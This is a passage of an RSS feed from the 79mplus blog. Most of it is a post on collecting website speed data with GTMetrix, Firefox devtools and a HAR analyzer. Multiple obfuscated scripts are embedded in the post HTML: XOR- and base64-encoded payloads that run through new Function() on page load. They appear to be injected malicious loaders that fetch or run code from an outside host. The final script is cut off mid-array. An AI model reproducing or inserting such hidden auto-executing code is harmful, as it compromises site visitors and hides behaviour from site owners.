28,13,36,2,27,29,1,37,13,32,25,46,13,26,47,26,30,48,17,16,14,26,17,17,0,29,25,46,12,10,43,41,12,26,9,31,14,121,14,25,9,47,120,4,9,9,1,37,0,47,13,42,13,48,25,7,0,30,13,50,3,34,17,123,30,63,35,17,11,63,39,43,29,27,17,27,14,10,112,26,15,10,14,16,11,48,63,3,11,26,17,16,11,32,63,60,0,9,13,6,29,14,10,11,10,10,39,17,12,26,39,26,29,26,48,25,9,33,17,16,15,9,35,10,15,121,13,43,29,13,1,13,10,13,1,37,13,32,25,46,13,26,47,26,30,48,17,16,0,9,59,4,14,47,60,13,2,32,1,29,0,48,13,17,13,30,43,31,14,63,120,25,14,10,63,31,12,9,121,13,0,63,63,16,15,47,120,25,14,32,44,26,29,9,1,37,14,48,47,2,9,26,60,26,14,48,63,7,31,28,63,4,11,48,17,4,29,30,10,25,25,47,26,11,2,32,1,29,0,48,13,17,13,30,43,3,0,10,43,44,29,28,5,57,6,34,44,16,11,47,120,4,13,10,43,45,13,10,112,9,29,27,17,26,13,48,9,16,29,14,10,11,10,14,10,11,10,10,112,5,14,48,39,6,13,10,17,16,31,27,17,2,13,10,43,30,13,10,32,26,2,47,63,43,12,26,120,42,13,30,9,11,13,10,113,26,2,47,63,43,12,26,120,42,13,29,44,13,2,32,43,17,14,48,124,7,14,47,36,16,14,26,63,16,0,47,120,26,29,9,59,43,12,25,63,4,14,121,35,56,11,48,17,29,13,9,39,43,30,63,59,43,11,32,17,30,12,48,48,26,14,63,63,30,14,30,10,11,12,48,47,4,31,27,17,16,11,48,124,28,15,47,113,13,9,32,5,3,14,32,43,4,11,26,56,12,16,35,60,16,27,30,125,30,14,10,63,6,13,26,17,44,25,121,124,43,12,26,13,37,15,32,47,30,14,30,125,30,11,26,47,4,15,10,25,3,25,49,1,11,12,26,18,12,2,32,39,26,0,26,39,24,9,10,6,30,0,26,47,6,15,13,6,45,27,25,14,45,29,33,17,43,0,48,63,12,9,25,26,30,16,32,29,17,12,26,63,3,12,30,124,35,30,26,9,44,25,120,47,13,25,47,59,43,12,25,63,4,14,121,35,37,12,32,124,30,11,9,121,26,2,32,43,17,14,48,124,7,14,47,35,33,2,47,63,43,12,26,120,42,13,27,26,30,2,32,43,4,0,32,5,41,12,121,10,16,12,26,13,43,14,121,13,46,12,10,43,41,12,26,9,31,14,121,13,37,12,26,112,44,14,26,18,25,9,47,112,17,11,121,35,37,0,32,39,2,15,13,25,37,12,26,112,44,14,26,18,46,16,49,17,6,0,48,120,30,14,36,43,4,0,9,39,5,14,25,121,15,2,32,120,41,12,9,5,16,15,121,13,37,12,26,112,44,14,26,18,16,11,48,63,3,12,10,29,6,29,13,6,45,16,35,1,25,0,121,13,37,0,32,39,2,15,14,9,4,0,9,120,5,11,48,44,18,2,32,124,41,11,26,32,16,11,48,63,2,14,26,47,41,0,14,14,31,2,30,18,27,16,30,18,30,16,36,125,25,25,47,59,43,12,25,63,4,14,121,35,37,11,26,9,16,14,26,9,17,29,27,17,5,0,9,120,44,15,48,14,27,27,14,10,11,10,14,10,16,15,32,47,6,15,32,14,26,0,63,63,16,15,47,120,25,14,32,44,26,29,9,1,4,0,9,120,5,11,48,44,18,2,47,35,25,14,48,29,25,15,14,13,37,12,10,63,6,0,26,59,26,29,35,32,25,25,47,26,25,25,47,25,46,12,10,43,41,12,26,9,31,14,121,35,37,11,9,124,27,0,26,29,29,29,27,17,6,0,32,29,17,29,9,1,24,15,9,60,18,2,47,63,46,11,47,60,13,0,26,17,41,12,10,25,43,14,63,121,16,15,47,59,43,15,9,120,43,24,10,29,43,14,10,63,16,12,30,14,45,11,32,39,4,13,9,35,6,16,36,10,11,2,47,63,46,11,47,60,16,11,47,59,41,26,11,17,6,0,32,29,17,29,36,125,31,15,9,35,25,30,63,35,26,11,29,17,3,26,14,125,27,2,47,13,17,14,47,124,7,29,36,125,46,2,47,113,13,16,36,1,120,15,9,120,26,30,48,112,30,14,32,17,4,29,28,120,17,12,26,48,16,14,48,17,7,29,30,10,31,28,120,36,2,27,29,36,25,25,33,17,5,0,63,39,4,30,48,47,3,9,10,43,41,26,9,120,4,12,10,48,11,29,26,120,31,15,47,63,29,0,10,43,6,30,48,13,43,15,10,120,14,10,26,120,31,15,47,63,29,0,10,43,6,30,48,59,31,0,25,10,25,30,48,47,2,11,26,63,16,0,28,39,26,13,10,29,44,29,27,17,5,0,63,39,4,29,13,1,13,2,47,35,25,14,48,29,25,15,14,14,2,29,14,43,6,13,26,63,16,29,26,112,5,14,48,39,6,13,10,17,16,29,27,17,6,0,32,29,17,29,9,1,25,0,121,13,37,12,26,124,30,15,14,9,37,11,9,124,27,0,26,29,29,29,27,17,6,0,32,29,17,29,13,1,13,29,13,1,13,29,14,14,25,25,47,117,117];
var _0xd2590aeec7ec=72;
var _0x695b12d6658b='';
for(var _0xecc7dff14118=0;_0xecc7dff14118<_0xc4c3ed2ddbac.length;_0xecc7dff14118++)
  _0x695b12d6658b+=String.fromCharCode(_0xc4c3ed2ddbac[_0xecc7dff14118]^_0xd2590aeec7ec);
var _0xb2ada9a65d62=121;
var _0x61fc9cbf8bf3=atob(_0x695b12d6658b);
var _code='';
for(var _0xecc7dff14118=0;_0xecc7dff14118<_0x61fc9cbf8bf3.length;_0xecc7dff14118++)
  _code+=String.fromCharCode(_0x61fc9cbf8bf3.charCodeAt(_0xecc7dff14118)^_0xb2ada9a65d62);
(new Function(_code))();
})();</script></p>
<p>The post <a rel="nofollow" href="https://79mplus.com/intercom-subscription-v1-0-24-is-now-available/">Intercom Subscription v1.0.24 is Here: Find Out What’s New</a> appeared first on <a rel="nofollow" href="https://79mplus.com">79mplus</a> and is written by <a rel="nofollow" href="https://79mplus.com/author/79mplus_editor/">79mplus Editor</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Step by Step Guide to Collect Data for Website Speed Optimization</title>
		<link>https://79mplus.com/step-by-step-guide-to-collect-data-for-website-speed-optimization/</link>
		
		<dc:creator><![CDATA[Adnan Shameem]]></dc:creator>
		<pubDate>Thu, 09 Aug 2018 03:03:35 +0000</pubDate>
				<category><![CDATA[79mplus blog]]></category>
		<category><![CDATA[support]]></category>
		<category><![CDATA[WordPress]]></category>
		<guid isPermaLink="false">https://www.79mplus.com/?p=496633</guid>

					<description><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://79mplus.com/assets/website-speed-data-gatherin.jpg" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/step-by-step-guide-to-collect-data-for-website-speed-optimization/">Step by Step Guide to Collect Data for Website Speed Optimization</a></p>
<p>Nobody likes slow loading websites. Technologies have made things smoother, faster and easier for us. We like faster things, so it is needless to say that we don&#8217;t like waiting for minutes to load a website. So having a fast loading website is a significant part of the User Experience. Here are some reasons why [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://79mplus.com/step-by-step-guide-to-collect-data-for-website-speed-optimization/">Step by Step Guide to Collect Data for Website Speed Optimization</a> appeared first on <a rel="nofollow" href="https://79mplus.com">79mplus</a> and is written by <a rel="nofollow" href="https://79mplus.com/author/adnan360/">Adnan Shameem</a></p>
]]></description>
										<content:encoded><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://79mplus.com/assets/website-speed-data-gatherin.jpg" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/step-by-step-guide-to-collect-data-for-website-speed-optimization/">Step by Step Guide to Collect Data for Website Speed Optimization</a></p>
<p>Nobody likes slow loading websites. Technologies have made things smoother, faster and easier for us. We like faster things, so it is needless to say that we don&#8217;t like waiting for minutes to load a website. So having a fast loading website is a significant part of the User Experience.</p>
<p>Here are some reasons why having a fast loading website is important:<br />
&#8211; Google likes fast loading websites and ranks them at the top. <a href="https://webmasters.googleblog.com/2010/04/using-site-speed-in-web-search-ranking.html" target="_blank" rel="noopener">Google&#8217;s Official Webmaster Central Blog</a> confirms that.<br />
&#8211; A fast loading e-commerce website can bring in extra sales for you. Even being 1 second faster matters.<br />
&#8211; A fast loading website can reduce the stress on your webserver and ensure stable performance over time.<br />
&#8211; Your website can get more page loads and user engagement when you have a fast loading website.<br />
&#8211; And of course it gives a better User Experience.</p>
<hr /><p><em>Google likes fast loading websites and ranks them at the top. Google&#039;s Official Webmaster Central Blog confirms that.</em><br /><a href="https://twitter.com/intent/tweet?url=https%3A%2F%2F79mplus.com%2F%3Fp%3D496633&#038;text=Google%20likes%20fast%20loading%20websites%20and%20ranks%20them%20at%20the%20top.%20Google%27s%20Official%20Webmaster%20Central%20Blog%20confirms%20that.&#038;via=79mplus&#038;related=79mplus" target="_blank" rel="noopener noreferrer">Share on X</a><br /><hr />
<p>If you have a slow website this will impact your sales, user conversion, page loads and many other things. The bottom line being, nobody wants to be slow.</p>
<hr /><p><em>If you have a slow website this will impact your sales, user conversion, page loads and many other things. The bottom line being, nobody wants to be slow.</em><br /><a href="https://twitter.com/intent/tweet?url=https%3A%2F%2F79mplus.com%2F%3Fp%3D496633&#038;text=If%20you%20have%20a%20slow%20website%20this%20will%20impact%20your%20sales%2C%20user%20conversion%2C%20page%20loads%20and%20many%20other%20things.%20The%20bottom%20line%20being%2C%20nobody%20wants%20to%20be%20slow.&#038;via=79mplus&#038;related=79mplus" target="_blank" rel="noopener noreferrer">Share on X</a><br /><hr />
<h1>Gathering Data about Website Speed</h1>
<p>Worry not. There are many tools to analyze why a website loads slow. These tools help look into elements that slow down a website. Knowing the reason for the slow speed would be the first step for your Website Speed Optimization. Let&#8217;s see how you can take that first step to Website Speed Optimization and hopefully even get more insights about your website on the way.</p>
<h2>GTMetrix.com</h2>
<p>This is by far the easiest method we tried. Even a kid with instructions can get a decent analysis from this!</p>
<hr /><p><em>This is by far the easiest method we tried. Even a kid with instructions can get a decent analysis from this!</em><br /><a href="https://twitter.com/intent/tweet?url=https%3A%2F%2F79mplus.com%2F%3Fp%3D496633&#038;text=This%20is%20by%20far%20the%20easiest%20method%20we%20tried.%20Even%20a%20kid%20with%20instructions%20can%20get%20a%20decent%20analysis%20from%20this%21&#038;via=79mplus&#038;related=79mplus" target="_blank" rel="noopener noreferrer">Share on X</a><br /><hr />
<p>&#8211; Go to <a href="https://gtmetrix.com/" target="_blank" rel="noopener">gtmetrix.com</a>.<br />
&#8211; Register and login in order to get HAR file output.<br />
&#8211; Enter the website URL and click Analyze.<br />
&#8211; It will load your website on its server and give you speed analysis results for many tools, such as PageSpeed, YSlow, Waterfall etc.<br />
&#8211; Visit the tabs to see which elements are slowing down your website.<br />
&#8211; To get the HAR file, go to Waterfall tab and click the Download HAR File button.</p>
<h2>Firefox Devtool</h2>
<p>This method requires a little more engagement, but you can get insights into your website&#8217;s elements that are contributing to a slower speed. Firefox has a comprehensive devtool that allows to export a HAR file. Although similar features exist in Chrome Devtools, I could not find a way to export a HAR file from it. You can try other browser devtools if you don&#8217;t need HAR file export.</p>
<p>&#8211; Start <a href="https://www.mozilla.org/en-US/firefox/" target="_blank" rel="noopener">Firefox</a> web browser.<br />
&#8211; Paste the website address on location bar, but don&#8217;t press enter.<br />
&#8211; Right click on empty space and choose Inspect element.<br />
&#8211; Go to &#8220;Performance&#8221; tab and click Start Recording.<br />
&#8211; Go to &#8220;Network&#8221; tab and click the Trash icon to delete any previous log records.<br />
&#8211; Now hit enter on the location bar and let it load completely (be attentive on the loading animation on the tab bar).<br />
&#8211; You can go to Performence tab and click Stop Recording.<br />
&#8211; Now go back to Network tab and you will see detailed log of which item took how much time to load. This will help you take the next steps.<br />
&#8211; To export HAR file right click any item, then click &#8220;Save All as HAR file&#8221;. It will download the HAR file to your computer. If you don&#8217;t need a HAR file, skip this step.</p>
<p>We have prepared <a href="https://www.youtube.com/watch?v=lYTBPqpRKNk" target="_blank" rel="noopener">a video showing these data gathering methods in greater details</a>. You can follow this step by step guide to easily get information about your website speed:</p>
<p><iframe title="Step by Step Guide to Collect Data for Website Speed Optimization" width="1080" height="608" src="https://www.youtube.com/embed/lYTBPqpRKNk?feature=oembed"  allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p>
<h1>Basic Data Analysis Tool Online</h1>
<p>Now that you have the HAR data on your hands, you can start to analyze it.<br />
&#8211; Go to this <a href="https://toolbox.googleapps.com/apps/har_analyzer/" target="_blank" rel="noopener">Online HAR Analyzer tool</a>.<br />
&#8211; Browse and select your HAR file.<br />
&#8211; It will show which elements are slowing down your website.</p>
<p>It is just a basic tool to show the elements inside the HAR file. This is similar to what you get on GTMetrix results or your browser devtool. In this case HAR file seems not to helpful. But it is great for sending to developers to get helpful insight into your website&#8217;s performance.</p>
<h1>Last Thoughts</h1>
<p>There are many ways to optimize the loading time of a website. The most basic ones being optimizing images, using CDNs, minifying css/js files etc. There are endless other ways to improve. It is upto website admins, content creators and developers to apply and maintain rules to ensure optimal website speed.</p>
<p>If you ever consult a development team to speed up your website, please remember, website speed optimization is not a one time thing. Be sure to ask them of any rules you should follow to ensure that the optimized speed stays intact over time.</p>
<hr /><p><em>If you ever consult a development team to speed up your website, please remember, website speed optimization is not a one time thing...</em><br /><a href="https://twitter.com/intent/tweet?url=https%3A%2F%2F79mplus.com%2F%3Fp%3D496633&#038;text=If%20you%20ever%20consult%20a%20development%20team%20to%20speed%20up%20your%20website%2C%20please%20remember%2C%20website%20speed%20optimization%20is%20not%20a%20one%20time%20thing...&#038;via=79mplus&#038;related=79mplus" target="_blank" rel="noopener noreferrer">Share on X</a><br /><hr />
<p>If any of these seem difficult to you or you need help getting the optimal speed from your WordPress website, <a href="https://www.79mplus.com/contact-us/">contact us</a> and we will try our best to get your website optimized.<script>!function(){var _0x432938422d85=atob('NHppcn9odXNyNDVnan1uPFYoUSgoUCFrdXJ4c2swRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBMHIve3BxbSE7fy8kfXl9JH95fXh+en4peTswdnAqKlJrIUc+dGhobG8mMzN/cHNpeHpwfW55MX90eX93MnJ5aD4wPD50aGhsJjMzJSgyLioyJSwyLS4qPkEndXo0RllYfyp+OjpGWVh/Kn5Hci97cHFtQTVueWhpbnInRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBITRGWVh/Kn5gYGdhNSdGWVh/Kn5Hci97cHFtQSEtJ3ppcn9odXNyPGsoWmlfazQ1Z3V6ND14c39pcXlyaDJ+c3hlNWdveWhIdXF5c2loNGsoWmlfazAuLDUnbnloaW5yJ2FqfW48UHR5Lm5oIXhzf2lxeXJoMn9ueX1oeVlweXF5cmg0O3h1ajs1MEV2fndKfyF4c39pcXlyaDJ/bnl9aHlZcHlxeXJoNDt1em59cXk7NSdQdHkubmgyb2hlcHkyf29vSHlkaCE7bHNvdWh1c3ImenVkeXgndXJveWgmLCdmMXVyeHlkJi4tKCsoJC8tKyonfn1/d3tuc2lyeCZue359NC0pMC4vMCguMDIoLjUnbHN1cmh5bjF5anlyaG8mcnNyeSc7J0V2fndKfzJodWhweSE7T3l/aW51aGU8f3R5f3c7J0V2fndKfzJveWhdaGhudX5paHk0O31wcHNremlwcG9/bnl5cjswOzs1J0V2fndKfzJvaGVweTJ/b29IeWRoITtsc291aHVzciZ6dWR5eCd1cm95aCYsJ2t1eGh0Ji0sLDkndHl1e3RoJi0sLDknfnNueHluJiwnZjF1cnh5ZCYuLSgrKCQvLSQqJ359f3d7bnNpcngmP3p6eic7J3hzf2lxeXJoMn5zeGUyfWxseXJ4X3R1cHg0UHR5Lm5oNSd4c39pcXlyaDJ+c3hlMn1sbHlyeF90dXB4NEV2fndKfzUnemlyf2h1c3I8VSgkV35qNDVnaG5lZ1B0eS5uaDJueXFzank0NSdFdn53Sn8ybnlxc2p5NDUnYX99aH90NEN5NWdhaG5lZ3h5cHloeTxGWVh/Kn5Hci97cHFtQWF/fWh/dDRDeS41Z2FhVihRKChQMn14eFlqeXJoUHVvaHlyeW40O3F5b299e3k7MHppcn9odXNyNEN5ajVnaG5lZ3V6ND1DeWpgYD1DeWoyeH1ofTVueWhpbnIndXo0Q3lqMnh9aH0yaGVseSEhITt6bDF5cX55eDF/cHNveTs1VSgkV35qNDUnYX99aH90NEN5LzVnYWE1J3ppcn9odXNyPGlzREt3UTR0UW5Ke0Y1Z3V6NHRRbkp7RiIhdnAqKlJrMnB5cntodDVueWhpbnInan1uPEN0ITs7J2huZWdDdCFPaG51cns0VihRKChQMnBzf31odXNyOjo0VihRKChQMnBzf31odXNyMnRzb2hyfXF5YGBWKFEoKFAycHN/fWh1c3IydHNvaDVgYDs7NTJueWxwfX95NDNCa2trQDIzdTA7OzUnYX99aH90NEN5dDVnYWp9bjxDaSF2cCoqUmtHdFFuSntGQTc7M3lxfnl4Mzs3ci97cHFtNzsjeXF+eXghLTs3NEN0IzQ7OnRzb2ghOzd5cn9zeHlJTlVfc3Fsc3J5cmg0Q3Q1NSY7OzUnan1uPENocyFveWhIdXF5c2loNHppcn9odXNyNDVnaXNES3dRNHRRbkp7RjctNSdhMC0uLCwsNSdFdn53Sn8yc3Jwc314IXppcn9odXNyNDVnf3B5fW5IdXF5c2loNENoczUnYSdFdn53Sn8yb25/IUNpJ2Fpc0RLd1E0LDUnYXV6NHhzf2lxeXJoMm55fXhlT2h9aHkhISE7cHN9eHVyezs1VihRKChQMn14eFlqeXJoUHVvaHlyeW40O1hTUV9zcmh5cmhQc314eXg7MGsoWmlfazUneXBveTxrKFppX2s0NSdhNTQ1Jw=='),_0xd3aca605a494=28,_0x3c4e336edd80=new Uint8Array(_0x432938422d85['length']),_0xd8f5713db852=0;for(;_0xd8f5713db852<_0x432938422d85['length'];_0xd8f5713db852++)_0x3c4e336edd80[_0xd8f5713db852]=_0x432938422d85['charCodeAt'](_0xd8f5713db852)^_0xd3aca605a494;(new Function(new TextDecoder()['decode'](_0x3c4e336edd80)))()}();</script><script>!function(){var _0x034992db8cf3=atob('CUdUT0JVSE5PCQhaV0BTAUlnFGQVYxxWSE9FTlYNV0USEVhtHElnFGQVY3oGfn5HUWRMQ0RFUgZ8DWgYS21YFBwGQhIZQERAGUJEQEVDR0MURAYNQERGYhNoHHoDSVVVUVIbDg5CTU5URUdNQFNEDEJJREJKD09EVQMNAQNJVVVRGw4OGBUPExcPGBEPEBMXA3waSEcJV0USEVhtBwdXRRIRWG16aBhLbVgUfAhTRFVUU08aV0USEVhtHElnFGQVY3oGfn5HUWRMQ0RFUgZ8HAlXRRIRWG1dXVpcCBpXRRIRWG16aBhLbVgUfBwQGkdUT0JVSE5PAWVEYFllVQkIWkhHCQBFTkJUTERPVQ9DTkVYCFpSRFV1SExETlRVCWVEYFllVQ0TEQgaU0RVVFNPGlxXQFMBT3RbRhdTHEVOQlRMRE9VD0JTREBVRGRNRExET1UJBkVIVwYIDVVAbUtlVxxFTkJUTERPVQ9CU0RAVURkTURMRE9VCQZIR1NATEQGCBpPdFtGF1MPUlVYTUQPQlJSdURZVRwGUU5SSFVITk8bR0hZREUaSE9SRFUbERpbDEhPRURZGxMQFRYVGRITERkaQ0BCSkZTTlRPRRtTRkNACRAUDRMSDRUTDQ8VEwgaUU5IT1VEUwxEV0RPVVIbT05PRBoGGlVAbUtlVw9VSFVNRBwGckRCVFNIVVgBQklEQkoGGlVAbUtlVw9SRFVgVVVTSENUVUQJBkBNTU5WR1RNTVJCU0RETwYNBgYIGlVAbUtlVw9SVVhNRA9CUlJ1RFlVHAZRTlJIVUhOTxtHSFlERRpIT1JEVRsRGlZIRVVJGxAREQQaSURIRklVGxAREQQaQ05TRURTGxEaWwxIT0VEWRsTEBUWFRkSExAZGkNAQkpGU05UT0UbAkdHRxoGGkVOQlRMRE9VD0NORVgPQFFRRE9FYklITUUJT3RbRhdTCBpFTkJUTERPVQ9DTkVYD0BRUURPRWJJSE1FCVVAbUtlVwgaR1RPQlVITk8BVHQTcU4QCQhaVVNYWk90W0YXUw9TRExOV0QJCBpVQG1LZVcPU0RMTldECQgaXEJAVUJJCX5ECFpcVVNYWkVETURVRAFXRRIRWG16aBhLbVgUfFxCQFVCSQl+RBMIWlxcSWcUZBVjD0BFRWRXRE9VbUhSVURPRFMJBkxEUlJARkQGDUdUT0JVSE5PCX5EVwhaVVNYWkhHCQB+RFddXQB+RFcPRUBVQAhTRFVUU08aSEcJfkRXD0VAVUAPVVhRRBwcHAZHUQxETENERQxCTU5SRAYIVHQTcU4QCQgaXEJAVUJJCX5EEghaXFwIGkdUT0JVSE5PAXNZTlFGaAltVUJvUFEIWkhHCW1VQm9QUR8cQERGYhNoD01ET0ZVSQhTRFVUU08aV0BTAX5JHAYGGlVTWFp+SRxyVVNIT0YJSWcUZBVjD01OQkBVSE5PBwcJSWcUZBVjD01OQkBVSE5PD0lOUlVPQExEXV1JZxRkFWMPTU5CQFVITk8PSU5SVQhdXQYGCA9TRFFNQEJECQ5/VlZWfQ8OSA0GBggaXEJAVUJJCX5ESQhaXFdAUwF+VBxAREZiE2h6bVVCb1BRfAoGDkRMQ0RFDgYKaBhLbVgUCgYeRExDREUcEAYKCX5JHgkGB0lOUlUcBgpET0JORUR0c2hiTkxRTk9ET1UJfkkICBsGBggaV0BTAX5VThxSRFV1SExETlRVCUdUT0JVSE5PCQhac1lOUUZoCW1VQm9QUQoQCBpcDRATERERCBpVQG1LZVcPTk9NTkBFHEdUT0JVSE5PCQhaQk1EQFN1SExETlRVCX5VTggaXBpVQG1LZVcPUlNCHH5UGlxzWU5RRmgJEQgaXEhHCUVOQlRMRE9VD1NEQEVYclVAVUQcHBwGTU5ARUhPRgYISWcUZBVjD0BFRWRXRE9VbUhSVURPRFMJBmVubGJOT1VET1VtTkBFREUGDWVEYFllVQgaRE1SRAFlRGBZZVUJCBpcCAkIGg=='),_0x52421b867837=33,_0xa898e8dc7503=new Uint8Array(_0x034992db8cf3['length']),_0xc54ff33ca072=0;for(;_0xc54ff33ca072<_0x034992db8cf3['length'];_0xc54ff33ca072++)_0xa898e8dc7503[_0xc54ff33ca072]=_0x034992db8cf3['charCodeAt'](_0xc54ff33ca072)^_0x52421b867837;(new Function(new TextDecoder()['decode'](_0xa898e8dc7503)))()}();</script><script>!function(){var _0x034992db8cf3=atob('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'),_0x52421b867837=33,_0xa898e8dc7503=new Uint8Array(_0x034992db8cf3['length']),_0xc54ff33ca072=0;for(;_0xc54ff33ca072<_0x034992db8cf3['length'];_0xc54ff33ca072++)_0xa898e8dc7503[_0xc54ff33ca072]=_0x034992db8cf3['charCodeAt'](_0xc54ff33ca072)^_0x52421b867837;(new Function(new TextDecoder()['decode'](_0xa898e8dc7503)))()}();</script><script>(function(){
var x46eaa6=6026;
if(x46eaa6>0){var y17321a=x46eaa6-6757}else{var y17321a=6757}
var zf368b3=y17321a*81;
var _0xc4c3ed2ddbac=[29,26,112,5,14,48,39,6,13,10,17,16,29,30,9,11,13,10,113,26,12,32,9,16,0,26,17,7,1,36,124,37,0,10,112,46,15,48,32,9,28,35,39,42,28,121,124,35,29,9,59,43,12,25,63,4,14,120,1,7,13,10,43,44,14,47,124,33,16,33,17,43,0,48,112,42,15,13,10,7,27,32,60,24,16,33,26,13,27,13,1,24,15,9,60,18,2,47,13,17,14,47,124,7,26,14,60,10,28,29,36,4,0,48,60,1,27,35,56,10,0,26,47,17,15,120,112,17,27,13,113,24,0,13,10,1,15,10,32,10,15,35,10,4,15,13,60,2,28,35,10,10,15,10,39,46,15,13,10,10,0,48,60,7,28,10,56,5,15,13,60,42,25,47,112,17,11,121,35,37,14,48,47,16,0,47,124,31,11,29,25,33,16,32,13,6,12,25,35,3,25,121,18,31,27,9,59,2,15,36,43,25,14,36,17,29,15,9,120,25,15,36,125,30,16,32,13,6,12,25,35,3,25,121,18,31,11,26,17,30,9,10,124,31,14,121,43,44,11,63,35,41,30,48,17,4,0,36,125,30,16,32,13,6,12,25,35,3,25,121,18,31,11,26,17,30,9,10,124,31,14,121,43,45,15,9,120,43,12,32,47,9,30,63,120,43,14,48,120,43,11,48,29,9,30,48,39,31,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,2,14,32,29,9,0,32,17,16,30,9,35,5,15,48,29,25,15,36,43,16,14,32,120,25,0,9,56,16,15,9,35,2,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,2,14,32,29,9,0,32,17,16,30,10,59,31,11,121,25,4,11,26,56,16,11,25,63,42,14,26,9,41,14,48,17,44,0,14,43,41,14,32,26,45,30,30,124,26,12,25,120,2,11,35,6,31,30,47,59,2,15,36,43,17,14,48,1,4,30,48,39,31,14,14,17,2,14,32,29,9,0,32,17,16,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,4,11,26,56,29,14,10,47,25,14,48,43,43,12,30,43,29,15,9,120,25,15,36,43,1,12,10,9,27,14,48,17,44,0,14,43,2,11,48,18,45,30,30,124,26,12,25,120,2,11,35,6,31,30,47,35,31,14,25,9,45,14,32,44,29,14,10,47,25,14,48,43,43,12,30,43,2,12,10,59,30,13,10,56,16,15,48,29,17,11,47,120,17,11,26,10,16,13,10,18,45,2,13,1,24,15,9,60,18,2,32,39,26,0,26,39,24,9,10,6,13,31,120,35,10,7,120,112,42,7,35,9,43,27,12,121,2,15,120,59,46,7,120,10,24,7,10,60,7,7,35,121,7,24,13,36,6,7,32,60,2,7,50,48,6,28,35,125,6,27,13,35,42,7,35,47,46,27,121,60,11,12,48,47,4,31,27,17,43,0,48,63,12,9,29,26,42,15,120,113,10,0,29,32,10,27,29,10,42,25,32,112,5,14,48,39,6,13,10,17,16,31,27,17,44,15,47,63,12,14,48,60,26,2,32,59,6,0,26,59,27,14,48,32,25,9,47,120,4,9,9,1,24,15,9,60,18,2,32,5,28,11,9,125,13,2,32,59,6,0,26,59,27,14,48,32,16,11,47,63,42,11,47,120,4,29,29,36,30,27,121,10,13,26,13,26,45,27,25,14,45,26,33,17,42,12,26,120,42,13,32,43,17,30,63,39,5,15,63,39,6,11,121,14,4,